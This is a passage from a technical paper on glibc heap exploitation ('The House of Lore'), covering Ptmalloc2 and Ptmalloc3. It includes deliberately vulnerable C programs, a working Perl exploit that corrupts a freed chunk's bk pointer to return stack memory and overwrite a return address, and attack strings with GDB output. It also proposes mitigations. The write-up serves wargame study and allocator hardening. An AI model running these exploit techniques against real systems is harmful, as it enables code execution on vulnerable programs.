    if (agents[sel_ag] != NULL) {
        free(agents[sel_ag]);
        agents[sel_ag] = NULL;
    
        printf("\n[+] Agent %d deleted\n", sel_ag);

        if (sel_ag == 0) {
            agent_count = 0;
	      printf("\n[!] Empty list, please create new agents\n");
        } else {
	      sel_ag -= 1;
            agent_count -= 1;
	      printf("[+] Current agent selection: %d\n", sel_ag);
        }
    } else {
        printf("\n[!] No agents to delete\n"); 
    }
}

---[ end agents.c ]---


This is the perfect program that I would present in a wargame to those who 
wish to apply the technique described in this paper.


Someone might think that maybe this program is vulnerable to other 
techniques described in the Malloc Des-Maleficarum. Indeed given the 
ability of the user to manage the memory space, it may seem that The House 
of Mind can be applied here, but one must see that the program limits us to
the creation of 256 structures of type "agent_t", and that the size of 
these structures is about 432 bytes (approximately when you allocate all 
its fields). If we multiply this number by 256 we get: (110592 = 0x1B000h) 
which seems too small to let us achieve the desirable address "0x08100000" 
necessary to corrupt the NON_MAIN_ARENA bit of an already allocated chunk 
above that address (and thus create a fake arena in order to trigger the 
attack aforementioned).

Another technique that one would take as viable would be The House of Force
since at first it is easy to corrupt the Wilderness (the Top Chunk), but
remember that in order to apply this method one of the requirements is that
the size of a call to malloc( ) must been defined by the designer with the
main goal of corrupting "av->top". This seems impossible here.

Other techniques are also unworkable for several reasons, each due to their
intrinsic requirements. So we must study how to sort the steps that trigger
the vulnerability and the attack process that we have studied so far.

Let's see in detail:

After a quick look, we found that the only vulnerable function is:


   void edit_name(void) {
      ...
         agents[sel_ag]->name = (char *) malloc(32);
      ...
      fgets(agents[sel_ag]->name, 322, stdin);


At first it seems a simple typographical error, but it allows us to 
override the memory chunk that we allocated after "agents[]->name", which
can be any, since the program allows practically a full control over 
memory.

To imitate the maximum possible vulnerable process shown in the previous
section, the most obvious thing we can do to start is to create a new agent
(0) and edit all fields. With this we get:


   malloc(sizeof(agent_t));  // new agent
   malloc(32);               // agents[0]->name
   malloc(128);              // agents[0]->lastname
   malloc(256);              // agents[0]->desc


The main target is to overwrite the "bk" pointer in the field 
"agents[]->lastname" if we have freed this chunk previously. Moreover, 
between these two actions, we need to allocate a chunk of memory to be
selected from the "TOP code", so that the chunks present in the unsorted 
bin are sorted in their corresponding bins for a later reuse.

For this, what we do is create a new agent(1), select the first agent(0) 
and delete its field "lastname", select the second agent(1) and edit its
description. This is equal to:


   malloc(sizeof(agent_t));      // Get a chunk from TOP code      
   free(agents[0]->lastname);    // Insert chunk at unsorted bin
   malloc(256);                  // Get a chunk from TOP code


After this last call to malloc( ), the freed chunk of 128 bytes (lastname)
will have been placed in its corresponding bin. Now we can alter "bk" 
pointer of this chunk, and for this we select again the first agent(0) and 
edit its name (here there will be no call to malloc( ) since it has been 
previously assigned).

At this time, we can place a proper memory address pointing to the stack 
and make two calls to malloc(128), first editing the "lastname" field of 
the second agent(1) and then editing the "lastname" field of agent(0) one
more time.

These latest actions should return a memory pointer located in the stack in
a position of your choice, and any written content on "agents[0]->lastname"
could corrupt a saved return address.

Without wishing to dwell too much more, we show here how a tiny-exploit 
alter the above pointer "bk" and returns a chunk of memory located in the
stack:


---[ exthl.pl ]---

#!/usr/bin/perl

print "1\n" .              # Create agents[0]
      "4\n" .              # Edit agents[0]
      "1\nblack\n" .       # Edit name agents[0]
      "2\nngel\n" .        # Edit lastname agents[0]
      "3\nsuperagent\n" .  # Edit description agents[0]
      "0\n1\n" .           # Create agents[1]
      "2\n0\n" .           # Select agents[0]
      "4\n5\n" .           # Delete lastname agents[0]
      "0\n2\n1\n" .        # Select agents[1]
      "4\n" .              # Edit agents[1]
      "3\nsupersuper\n" .  # Edit description agents[1]
      "0\n2\n0\n" .        # Select agents[0]
      "4\n" .              # Edit agents[0]
      "1\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
      "\x94\xee\xff\xbf" . # Edit name[0] and overwrite "lastname->bk"
      "\n0\n2\n1\n" .      # Select agents[1]
      "4\n" .              # Edit agents[1]
      "2\nother\n" .       # Edit lastname agents[1]
      "0\n2\n0\n" .        # Select agents[0]
      "4\n" .              # Edit agents[0]
      "2\nBBBBBBBBBBBBBBBBBBBBB" .
      "BBBBBBBBBBBBBBBBBBBBBBBBBBBB\n"; # Edit lastname agents[0]
                                        # and overwrite a {RET}

---[ end exthl.pl ]---


And here is the result, displaying only the outputs of interest for us:


black@odisea:~/ptmalloc2$ ./exthl | ./agents
.....      

[PTMALLOC2] -> (Smallbin code reached)              
[PTMALLOC2] -> (victim = [ 0x8 ])             // Create new agents[0]    
Agent 0 created, now you can edit it                

.....

[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) name [ 0x804f020 ]            // Edit name agents[0]          
Write name for this agent:                            

.....

[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) lastname [ 0x804f048 ]        // Edit lastname agents[0]
Write lastname for this agent:                        

.....
  
[PTMALLOC2] -> (Chunk from TOP)                       
[!!!]malloc(ed) desc [ 0x804f0d0 ]           // Edit description agents[0]                  
Write description for this agent:                     

.....
  
[PTMALLOC2] -> (Chunk from TOP)                       
Agent 1 created, now you can edit it         // Create new agents[1]
         
.....
  
Write agent number:                                   
[+] Agent 0 selected.                        // Select agents[0]         

.....
 
[PTMALLOC2] -> (Freed and unsorted [ 0x804f040 ] chunk) // Delete lastname

.....
  
Write agent number:                                    
[+] Agent 1 selected.                        // Select agents[1]           

.....
  
[PTMALLOC2] -> (Chunk from TOP)                        
[!!!]malloc(ed) desc [ 0x804f1f0 ]           // Edit description agents[1]             
Write description for this agent:                      

.....

Write agent number:                                    
[+] Agent 0 selected.                        // Select agents[0] 

.....
  
Write name for this agent:                   // Edit name agents[0]                     
   
Write agent number:                                    
[+] Agent 1 selected.                        // Select agents[1]

.....

[PTMALLOC2] -> (Smallbin code reached)                 
[PTMALLOC2] -> (victim = [ 0x804f048 ])                
[PTMALLOC2] -> (victim->bk = [ 0xbfffee94 ])           

[!!!]malloc(ed) lastname [ 0x804f048 ]
Write lastname for this agent:               // Edit lastname agents[1]

.....
 
Write agent number:                                   
[+] Agent 0 selected.                        // Select agents[0]          

.....

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])

[!!!]malloc(ed) lastname [ 0xbfffee9c ]     // Edit lastname agents[0]
Segmentation fault
black@odisea:~/ptmalloc2$


Everyone can predict what happened in the end, but GDB can clarify for us a
few things:


----- snip -----

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbfffee94 ])
[PTMALLOC2] -> (victim->bk = [ 0xbfffeec0 ])

[!!!]malloc(ed) lastname [ 0xbfffee9c ]

Program received signal SIGSEGV, Segmentation fault.
0x080490f6 in edit_lastname ()
(gdb) x/i $eip
0x80490f6 <edit_lastname+150>:  ret
(gdb) x/8x $esp
0xbfffee9c:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffeeac:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb)

----- snip -----


And you have moved to the next level of your favorite wargame, or at least
you have increased your level of knowledge and skills. 

Now, I encourage you to compile this program with your regular glibc (not
static Ptmalloc2), and verify that the result is exactly the same, it does
not change the inside code.

I don't know if anyone had noticed, but another of the techniques that in 
principle could be applied to this case is the forgotten The House of 
Prime. The requirement for implementing it is the manipulation of the 
header of two chunks that will be freed. This is possible since an overflow
in agents[]->name can override both agents[]->lastname and agents[]->desc, 
and we can decide both when freeing them and in what order. However, The 
House of Prime needs also at least the possibility of placing an integer
on the stack to overcome a last check and this is where it seems that we
stay trapped. Also, remember that since glibc 2.3.6 one can no longer pass 
to free( ) a chunk smaller than 16 bytes whereas this is the first 
requirement inherent to this technique (alter the size field of the first 
piece overwritten 0x9h = 0x8h + PREV_INUSE bit).



               << It is common sense to take a method and
                  try it; if it fails, admit it frankly and
                  try another. But above all, try something. >>

                                      [ Franklin D. Roosevelt ]



           .------------------------------.
---[ 3 ---[   LargeBin Corruption Method   ]---
           .------------------------------.

In order to apply the method recently explained to a largebin we need the 
same conditions, except that the size of the chunks allocated should be 
above 512 bytes as seen above.

However, in this case the code triggered in "_int_malloc( )" is different 
and more complex. Extra requirements will be necessary in order to achieve 
a successful execution of arbitrary code.

We will make some minor modifications to the vulnerable program presented
in 2.2.1 and will see, through the practice, which of these preconditions
must be met.

Here is the code:


---[ thl-large.c ]---

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void evil_func(void)
{
    printf("\nThis is an evil function. You become a cool \
              hacker if you are able to execute it\n"); 
}

void func1(void)
{
    char *lb1, *lb2;
     
    lb1 = (char *) malloc(1536);
    printf("\nLB1 -> [ %p ]", lb1);
    lb2 = malloc(1536);
    printf("\nLB2 -> [ %p ]", lb2);

    strcpy(lb1, "Which is your favourite hobby: ");
    printf("\n%s", lb1);
    fgets(lb2, 128, stdin);
}

int main(int argc, char *argv[])
{
    char *buff1, *buff2, *buff3;

    malloc(4096);
    buff1 = (char *) malloc(1024);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(2048);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(4096);
    printf("\nBuff3 -> [ %p ]\n", buff3);

    free(buff2);

    printf("\nBuff4 -> [ %p ]", malloc(4096));

    strcpy(buff1, argv[1]);

    func1();

    return 0;
}

---[ end thl-large.c ]---


As you can see, we still need an extra reserve (buff4) after releasing the 
second allocated chunk. This is because it's not a good idea to have a 
corrupted "bk" pointer in a chunk that still is in the unsorted bin. When 
it happens, the program usually breaks sooner or later in the instructions:


      /* remove from unsorted list */
      unsorted_chunks(av)->bk = bck;
      bck->fd = unsorted_chunks(av);


But if we do not make anything wrong before the recently freed chunk is 
placed in its corresponding bin, then we pass without penalty or glory the 
next area code:


    while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {
       ...
    }


Having passed this code means that (buff2) has been introduced in its 
corresponding largebin. Therefore we will reach this code:


----- snip -----

    if (!in_smallbin_range(nb)) {
      bin = bin_at(av, idx);

      for (victim = last(bin); victim != bin; victim = victim->bk) {
	size = chunksize(victim);

	if ((unsigned long)(size) >= (unsigned long)(nb)) {
	  printf("\n[PTMALLOC2] No enter here please\n");
	  remainder_size = size - nb;
	  unlink(victim, bck, fwd);
	  .....

----- snip -----


This does not look good. The unlink( ) macro is called, and we know the 
associated protection since the 2.3.6 version of Glibc. Going there would 
destroy all the work done until now.

Here comes one of the first differences in the largebin corruption method. 
In 2.2.1 we said that after overwriting the "bk" pointer of the free( ) 
chunk, two calls to malloc( ) with the same size should be carried out to 
return a pointer *mem in an arbitrary memory address.

In largebin corruption, we must avoid this code at all cost. For this, the
two calls to malloc( ) must be less than buff2->size. Phantasmal told us 
"512 < M < N", and that is what we see in our vulnerable application:
512 < 1536 < 2048.

As it has not previously been freed any chunk of this size (1536) or at 
least belonging to the same bin, "_int_malloc( )" tries to search a chunk 
that can fulfill the request from the next bin to the recently scanned:


    // Search for a chunk by scanning bins, starting with next largest bin.

    ++idx;
    bin = bin_at(av,idx); 


And here is where the magic comes, the following piece of code will be 
executed:


----- snip -----

      victim = last(bin);
      .....
      else {
        size = chunksize(victim);

        remainder_size = size - nb;

printf("\n[PTMALLOC2] -> (Largebin code reached)");
printf("\n[PTMALLOC2] -> remander_size = size (%d) - nb (%d) = %u", size,
                                                       nb, remainder_size);
printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);
printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", victim->bk);

        /* unlink */
        bck = victim->bk;
        bin->bk = bck;
        bck->fd = bin;

        /* Exhaust */
        if (remainder_size < MINSIZE) {
	  printf("\n[PTMALLOC2] -> Exhaust code!! You win!\n");
          .....
          return chunk2mem(victim);
        }

        /* Split */
        else {
          .....
          set_foot(remainder, remainder_size);
          check_malloced_chunk(av, victim, nb);
          return chunk2mem(victim);
        }
      }

----- snip -----


The code has been properly trimmed to show only the parts that have 
relevance in the method we are describing. Calls to printf( ) are of my own
and you will soon see its usefulness.

Also it's easy to see that the process is practically the same as in the
smallbin code. You take the last chunk of the respective largebin 
(last(bin)) in "victim" and proceed to unlink it (without macro) before 
reaching the user control. Since we control "victim->bk", at first the
attack requirements are the same, but then, where is the difference?

Calling set_foot( ) tends to produce a segmentation fault since that
"remainder_size" is calculated from "victim->size", value that until now we
were filling out with random data. The result is something like the 
following:


(gdb) run `perl -e 'print "A" x 1036 . "\x44\xf0\xff\xbf"'`                                                                                  

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x8050010 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050418 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050c20 ]

[PTMALLOC2] -> (Freed and unsorted [ 0x8050410 ] chunk)
[PTMALLOC2] -> (Chunk from TOP)
Buff4 -> [ 0x8051c28 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (1094795584) - nb (1544) = 1094794040
[PTMALLOC2] -> (victim = [ 0x8050410 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])

Program received signal SIGSEGV, Segmentation fault.
0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
4144              set_foot(remainder, remainder_size);
(gdb)


The solution is then enforce the conditional:

   if (remainder_size < MinSize) {
      ...
   }.

Anyone might think of overwriting "victim->size" with a value like 
"0xfcfcfcfc" which would generate as a result a negative number smaller 
than MINSIZE, but we must remember that "remainder_size" is defined as an 
"unsigned long" and therefore the result will always be a positive value.

The only possibility that remains then is that the vulnerable application
allows us to insert null bytes in the attack string, and therefore to 
supply a value as (0x00000610 = 1552) that would generate: 
1552 - 1544 (align) = 8 and the condition would be fulfilled. Let us see in
action:


(gdb) set *(0x08050410+4)=0x00000610        
(gdb) c                                     
Continuing.                                
Buff4 -> [ 0x8051c28 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (1552) - nb (1544) = 8
[PTMALLOC2] -> (victim = [ 0x8050410 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])

[PTMALLOC2] -> Exhaust code!! You win!

LB1 -> [ 0x8050418 ]
[PTMALLOC2] -> (Largebin code reached)
[PTMALLOC2] -> remander_size = size (-1073744384) - nb (1544) = 3221221368
[PTMALLOC2] -> (victim = [ 0xbffff044 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff651 ])

Program received signal SIGSEGV, Segmentation fault.
0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
4144              set_foot(remainder, remainder_size);


Perfect, we reached the second memory request where we saw that victim is
equal to 0xbffff044 which being returned would provide a chunk whose *mem 
pointes to the stack. However set_foot( ) again gives us problems, and this
is obviously because we are not controlling the "size" field of this fake 
chunk created on the stack.

This is where we have to overcome the latter condition. Victim should point
to a memory location containing user-controlled data, so that we can enter 
an appropriate "size" value and conclude the technique.

We end this section by saying that the largebin corruption method is not 
just pure fantasy as we've made it a reality. However it is true that 
finding the required preconditions of attack in real-life applications is
almost impossible.

As a curious note, one might try to overwrite "victim->size" with 
0xffffffff (-1) and check that on this occasion set_foot( ) seems to follow
its course without breaking the program.

Note: Again we have not tested all versions of glibc, but we noted the
following fixes in advanced versions:


----- snip -----

      else {
        size = chunksize(victim);

        /*  We know the first chunk in this bin is big enough to use. */
        assert((unsigned long)(size) >= (unsigned long)(nb));  <-- !!!!!!!

        remainder_size = size - nb;

        /* unlink */
        unlink(victim, bck, fwd);

        /* Exhaust */
        if (remainder_size < MINSIZE) {
          set_inuse_bit_at_offset(victim, size);
          if (av != &main_arena)
            victim->size |= NON_MAIN_ARENA;
        }

        /* Split */
        else {

----- snip -----


What this means is that the unlink( ) macro has been newly introduced into 
the code, and thus the classic pointer testing mitigate the attack.



               << Insanity is doing the same
                  thing over and over again, and
                  expecting different results. >>

                                   [ Albert Einstein ]



           .-------------------------.
---[ 4 ---[   Analysis of Ptmalloc3   ]---
           .-------------------------.

Delving into the internals of Ptmalloc3, without warm up, may seem violent,
but with a little help it's only a child's game.

In order to understand correctly the next sections, I present here the most
notable differences in the code with respect to Ptmalloc2.

The basic operation remains the same, in the end it's another common memory
allocator, and is also based on a version of Doug Lea allocator but adapted
to work on multiple threads.

For example, here is the chunk definition:


struct malloc_chunk {
  size_t               prev_foot;  /* Size of previous chunk (if free).  */
  size_t               head;       /* Size and inuse bits. */
  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;
};


As we see, the names of our well known "prev_size" and "size" fields have
been changed, but the meaning remains the same. Furthermore we knew three
usual bit control to which they added an extra one called "CINUSE_BIT"
which tells (in a redundant way) that the current chunk is assigned, as
opposed to that PINUSE_BIT that continues to report the allocation of the
previous chunk. Both bits have their corresponding checking and assign
macros.

The known "malloc_state" structure now stores the bins into two different
arrays for different uses:


     mchunkptr  smallbins[(NSMALLBINS+1)*2];
     tbinptr    treebins[NTREEBINS];


The first of them stores free chunks of memory below 256 bytes. Treebins[]
is responsible for long pieces and uses a special tree organization. Both
arrays are important in the respective techniques that will be discussed in
the following sections, providing there more details about its management
and corruption.

Some of the areas of greatest interest in "malloc_state" are:

     char*      least_addr;
     mchunkptr  dv;
     size_t     magic;

 * "least_addr" is used in certain macros to check if the address of a
   given P chunk is within a reliable range.

 * "dv", or Designated Victim is a piece that can be used quickly to serve 
   a small request, and to gain efficiency is typically, by general rule, 
   the last remaining piece of another small request. This is a value that
   is used frequently in the smallbin code, and we will see it in the next
   section.

 * "Magic" is a value that should always be equal to malloc_params.magic 
   and in principle is obtained through the device "/dev/urandom". This 
   value can be XORed with mstate and written into p->prev_foot for later
   to retrieve the mstate structure of that piece by applying another XOR
   operation with the same value. If "/dev/urandom" can not be used, magic
   is calculated from the time(0) syscall and "0x55555555U" value with 
   other checkups, and if the constant INSECURE was defined at compile 
   time magic then directly take the constant value: "0x58585858U".

For security purposes, some of the most important macros are following:


#define ok_address(M, a) ((char*)(a) >= (M)->least_addr)
#define ok_next(p, n)    ((char*)(p) < (char*)(n))
#define ok_cinuse(p)     cinuse(p)
#define ok_pinuse(p)     pinuse(p)
#define ok_magic(M)      ((M)->magic == mparams.magic)


which could always return true if the constant INSECURE is defined at
compile time (which is not the case by default).


The last macro that you could be observe frequently is "RTCHECK(e)" which 
is nothing more than a wrapper for "__builtin_expect(e, 1)", which in time 
is more familiar from previous studies on malloc.

As we said, "malloc_params" contains some of the properties that can be
established through "mallopt(int param, int value)" at runtime, and
additionally we have the structure "mallinfo" that maintains the global
state of the allocation system with information such as the amount of 
already allocated space, the amount of free space, the number of total free
chunks, etc...

Talking about the management of Mutex and treatment of Threads in Ptmalloc3
is something beyond the scope of this article (and would probably require 
to write an entire book), so we will not discuss this issue and will rather
go forward.

In the next section we see that every precaution that have been taken are 
not sufficient to mitigate the attack presented here.



               << Software is like entropy: It is
                  difficult to grasp, weighs nothing,
                  and obeys the Second Law of Thermodynamics:
                  i.e., it always increases. >>

                                         [ Norman Augustine ]



             .---------------------------------.
---[ 4.1 ---[   SmallBin Corruption (Reverse)   ]---
             .---------------------------------.

In an attempt to determine whether THoL could be viable in this last
version of Wolfram Gloger. This version have a lot security mechanisms and 
integrity checks against heap overflows, fortunately I discovered a variant
of our smallbin corruption method, this variant could be applied.

To begin, we compile Ptmalloc3 and link the library statically with the
vulnerable application presented in 2.2.1. After using the same method to
exploit that application (by adjusting the evil_func( ) address of course,
which would be our dummy shellcode), we obtain a segment violation at
malloc.c, particularly in the last instruction of this piece of code:


----- snip -----

void* mspace_malloc(mspace msp, size_t bytes) {
  .....
  if (!PREACTION(ms)) {
    .....
    if (bytes <= MAX_SMALL_REQUEST) {
    .....
      if ((smallbits & 0x3U) != 0) {
        .....
        b = smallbin_at(ms, idx);
        p = b->fd;
        unlink_first_small_chunk(ms, b, p, idx);

----- snip -----


Ptmalloc3 can use both dlmalloc( ) and mspace_malloc( ) depending on
whether the constant "ONLY_MSPACES" has been defined at compile-time (this 
is the default option -DONLY_MSPACES). This is irrelevant for the purposes 
of this explanation since the code is practically the same for both 
functions.

The application breaks when, after having overwritten the "bk" pointer of 
buff2, one requests a new buffer with the same size. Why does it happen?

As you can see, Ptmallc3 acts in an opposite way of Ptmalloc2. Ptmalloc2 
attempts to satisfy the memory request with the last piece in the bin, 
however, Ptmalloc3 intends to cover the request with the first piece of the
bin: "p = b->fd".

mspace_malloc () attempts to unlink this piece of the corresponding bin to 
serve the user request, but something bad happens inside the 
"unlink_first_small_chunk( )" macro, and the program segfaults.

Reviewing the code, we are interested by a few lines:


----- snip -----

#define unlink_first_small_chunk(M, B, P, I) {\
  mchunkptr F = P->fd;\                  [1]
  .....
  if (B == F)\
    clear_smallmap(M, I);\
  else if (RTCHECK(ok_address(M, F))) {\ [2]
    B->fd = F;\                          [3]
    F->bk = B;\                          [4]
  }\
  else {\
    CORRUPTION_ERROR_ACTION(M);\
  }\
}

----- snip -----


Here, P is our overwritten chunk, and B is the bin belonging to that piece.
In [1], F takes the value of the "fd" pointer that we control (at the same 
time that we overwrote the "bk" pointer in buff2).

If [2] is overcome, which is a security macro we've seen in the previous
section:


    #define ok_address(M, a) ((char*)(a) >= (M)->least_addr)


where the least_addr field is "the least address ever obtained from 
MORECORE or MMAP"... then anything of higher value will pass this test.

We arrive to the classic steps of unlink, in [3] the "fd" pointer of the 
bin points to our manipulated address. In [4] is where a segmentation 
violation occurs, as it tries to write to (0x41414141)->bk the address of 
the bin. As it falls outside the allocated address space, the fun ends.

For the smallbin corruption technique over Ptmalloc3 it is necessary to 
properly overwrite the "fd" pointer of a freed buffer with a random 
address. After, it is necessary to try making a future call to malloc( ), 
with the same size, that returns the random address as the allocated space.

The precautions are the same as in 2.2.1, F->bk must contain a writable 
address, otherwise it will cause an access violation in [4].

If we accomplish all this conditions, the first chunk of the bin will be 
unlinked and the following piece of code will be triggered.


----- snip -----

        mem = chunk2mem(p);
        check_malloced_chunk(gm, mem, nb);
        goto postaction;

        .....
        postaction:
            POSTACTION(gm);
            return mem;

----- snip -----


I added the occasional printf( ) sentence into mspace_malloc( ) and the 
unlink_first_small_chunk( ) macro to see what happened, and the result was 
as follow:


Starting program: /home/black/ptmalloc3/thl `perl -e 'print "A"x24 .
"\x28\xf3\xff\xbf"'` < evil.in                                                                             

[mspace_malloc()]: 16 bytes <= 244
Buff1 -> [ 0xb7feefe8 ]
[mspace_malloc()]: 128 bytes <= 244
Buff2 -> [ 0xb7fef000 ]
Buff3 -> [ 0xb7fef088 ]

Buff4 -> [ 0xb7fef190 ]

[mspace_malloc()]: 128 bytes <= 244
[unlink_first_small_chunk()]: P->fd = 0xbffff328
LB1 -> [ 0xb7fef000 ]

[mspace_malloc()]: 128 bytes <= 244
[unlink_first_small_chunk()]: P->fd = 0xbffff378
LB2 -> [ 0xbffff330 ]

Which is your favourite hobby:
This is an evil function. You become a cool hacker if you are able to
execute it


"244" is the present value of MAX_SMALL_REQUEST, which as we can see, is 
another difference from Ptmalloc2, which defined a smallbin whenever 
requested size was less than 512. In this case the range is a little more 
limited.



               << From a programmer's point of view,
                  the user is a peripheral that types
                  when you issue a read request. >>

                                      [ P. Williams ]



             .----------------------------------------.
---[ 4.2 ---[   LargeBin Method (TreeBin Corruption)   ]---
             .----------------------------------------.

At this point of the article, we have understood the basic concepts 
correctly. One could now continue to study on his own the Ptmalloc3 
internals.

In Ptmalloc3, large chunks (ie larger than 256 bytes), are stored in a tree
structure where each chunk has a pointer to its father, and retains two 
pointers to its children (left and right) if having any. The code that 
defines this structure is the following:


----- snip -----

struct malloc_tree_chunk {
  /* The first four fields must be compatible with malloc_chunk */
  size_t                    prev_foot;
  size_t                    head;
  struct malloc_tree_chunk* fd;
  struct malloc_tree_chunk* bk;

  struct malloc_tree_chunk* child[2];
  struct malloc_tree_chunk* parent;
  bindex_t                  index;
};

----- snip -----


When a memory request for a long buffer is made, the
"if (bytes <= MAX_SMALL_REQUEST) {}" sentence fails, and the executed code,
if nothing strange happens, is as follow:


----- snip -----

    else {
      nb = pad_request(bytes);
      if (ms->treemap != 0 && (mem = tmalloc_large(ms, nb)) != 0) {
        check_malloced_chunk(ms, mem, nb);
        goto postaction;
      }
    }

----- snip -----


Into tmalloc_large( ), we aim to achieve this code:


----- snip -----

  if (v != 0 && rsize < (size_t)(m->dvsize - nb)) {
    if (RTCHECK(ok_address(m, v))) { /* split */
      .....
      if (RTCHECK(ok_next(v, r))) {
        unlink_large_chunk(m, v);
        if (rsize < MIN_CHUNK_SIZE)
          set_inuse_and_pinuse(m, v, (rsize + nb));
        else {
          set_size_and_pinuse_of_inuse_chunk(m, v, nb);
          set_size_and_pinuse_of_free_chunk(r, rsize);
          insert_chunk(m, r, rsize);
        }
        return chunk2mem(v);
        .....

----- snip -----


If we tried to exploit this program in the same way as for Ptmalloc2, the
application would break first in the "unlink_large_chunk( )" macro, which 
is very similar to "unlink_first_small_chunk( )". The most important lines 
of this macro are these:


    F = X->fd;\ [1]
    R = X->bk;\ [2]
    F->bk = R;\ [3]
    R->fd = F;\ [4]


Thus we now know that both the "fd" and "bk" pointers of the overwritten
chunk must be pointing to writable memory addresses, otherwise this could
lead to an invalid memory access.

The next error will come in: "set_size_and_pinuse_of_free_chunk(r, rsize)",
which tells us that the "size" field of the overwritten chunk must be
user-controlled. And so again, we need the vulnerable application to allow
us introducing NULL bytes.

If we can accomplish this, the first call to "malloc(1536)" of the 
application shown in section 3 will be executed correctly, and the issue 
will come with the second call. Specifically within the loop:


----- snip -----

  while (t != 0) { /* find smallest of tree or subtree */
    size_t trem = chunksize(t) - nb;
    if (trem < rsize) {
      rsize = trem;
      v = t;
    }
    t = leftmost_child(t);
  }

----- snip -----


When you first enter this loop, "t" is being equal to the address of the 
first chunk in the tree_bin[] corresponding to the size of the buffer 
requested. The loop will continue while "t" has still some son and, finally
"v" (victim) will contain the smallest piece that can satisfy the request.

The trick for saving our problem is to exit the loop after the first 
iteration. For this, we must make "leftmost_child(t)" returning a "0" 
value.

Knowing the definition:


#define leftmost_child(t) ((t)->child[0] != 0? (t)->child[0]:(t)->child[1])


The only way is to place (buff2->bk) in an address of the stack. It is 
necessary the pointers child[0] and child[1] with a "0" value, which means 
no more children. Then "t" (and therefore "v") will be provided while the 
"size" field not fails the if( ) sentence.



               << Before software should be
                  reusable, it should be usable. >>

                                  [ Ralph Johnson ] 



             .-----------------------------.
---[ 4.3 ---[   Implement Security Checks   ]---
             .-----------------------------.

Ptmalloc3 could be safer than it seems at first, but for this, you should
have defined the FOOTERS constant at compile time (which is not the default
case).

We saw the "magic" parameter at the beginning of section 4, which is 
present in all malloc_state structures and the way in which it is 
calculated. The reason why "prev_size" now is named as "prev_foot" if that 
if FOOTERS is defined, then this field is used to store the result of a XOR
operation between the mstate belonging to the chunk and the magic value 
recently calculated. This is done with:


/* Set foot of inuse chunk to be xor of mstate and seed */
#define mark_inuse_foot(M,p,s)\
 (((mchunkptr)((char*)(p)+(s)))->prev_foot = ((size_t)(M) ^ mparams.magic))


XOR, as always, remains being a symmetric encryption that allows, at the 
same time, saving the malloc_state address and establishing a kind of 
cookie to prevent a possible attack whenever altered. This mstate is 
obtained with the following macro:


#define get_mstate_for(p)\
  ((mstate)(((mchunkptr)((char*)(p) +\
    (chunksize(p))))->prev_foot ^ mparams.magic))


For example, at the beginning of the "mspaces_free( )" function which is 
called by the wrapper free( ), is started in this way:


   #if FOOTERS
       mstate fm = get_mstate_for(p);
   #else /* FOOTERS */
       mstate fm = (mstate)msp;
   #endif /* FOOTERS */
       if (!ok_magic(fm)) {
         USAGE_ERROR_ACTION(fm, p);
         return;
       }


If we corrupt the header of an allocated chunk (and therefore the prev_foot
field). When the chunk was freed, get_mstate_for( ) will return an 
erroneous arena. At this moment ok_magic( ) will test the "magic" value of 
that area and it will abort the application.

Moreover, one must be aware that the current flow could be broken even
before the USAGE_ERROR_ACTION( ) call if the reading of fm->magic causes a 
segmentation fault due to wrong value obtained by get_mstate_for( ).

How to deal with this cookie and the probability analysis in order to
predict its value at runtime is an old issue, and we will not talk more
here about it. Though one could remember the PaX case, perhaps an 
overwritten pointer can point beyond the "size" field of a chunk, and 
through a future STRxxx( ) or MEMxxx( ) call, crush their data without have
altered "prev_foot". Skape made an excellent job in his "Reducing the 
effective entropy of gs cookies" [4] for the Windows platform. It could 
give you some fantastic ideas to apply. Who knows, it all depends on the 
vulnerability and inherent requirements of the tested application. 

What is the advantage of THoL according to this protection? It is very 
clear, the target chunk is corrupted after its release, and therefore the 
integrity checks are passed.

Anyway, there should be ways to mitigate these kinds of problems, to start,
if we all know that no memory allocation should proceed belonging to a 
stack location, one could implement something as simple as this:

#define STACK_ADDR 0xbff00000

#define ok_address(M, a) (((char*)(a) >= (M)->least_addr)\
			  && ((a) <= STACK_ADDR))


and the application is aborted before getting a successful exploitation.
Also a check as ((a) >> 20) == 0xbff) should be effective. It is only an
example, the relative stack position could be very different in your 
system, it is a very restrictive protection.

Anyone who read the source code base has probably noticed that Ptmalloc3's
unlink...( ) macros omit the classic tests that implanted in glibc to check
the double linked list. We do not consider this because we know that a real
implementation would take it into account and should add this integrity 
check. However, I can not perform a more detailed stud until someone 
decides in a future that glibc will be based on Ptmalloc3.

The conclusion of this overview is that some of the techniques detailed in
the Maleficarum & Des-Maleficarum papers are not reliable in Ptmalloc3. One
of them, for example, is The House of Force. Remember that it needs both to 
overwrite the "size" field of the wilderness chunk and a request with a 
user-defined size. This was possible partly in Ptmalloc2 because the size 
of the top chunk was read in this way:


    victim = av->top;
    size = chunksize(victim);


Unfortunately, now Ptmalloc3 saves this value in the "malloc_state" and 
reads it directly with this:


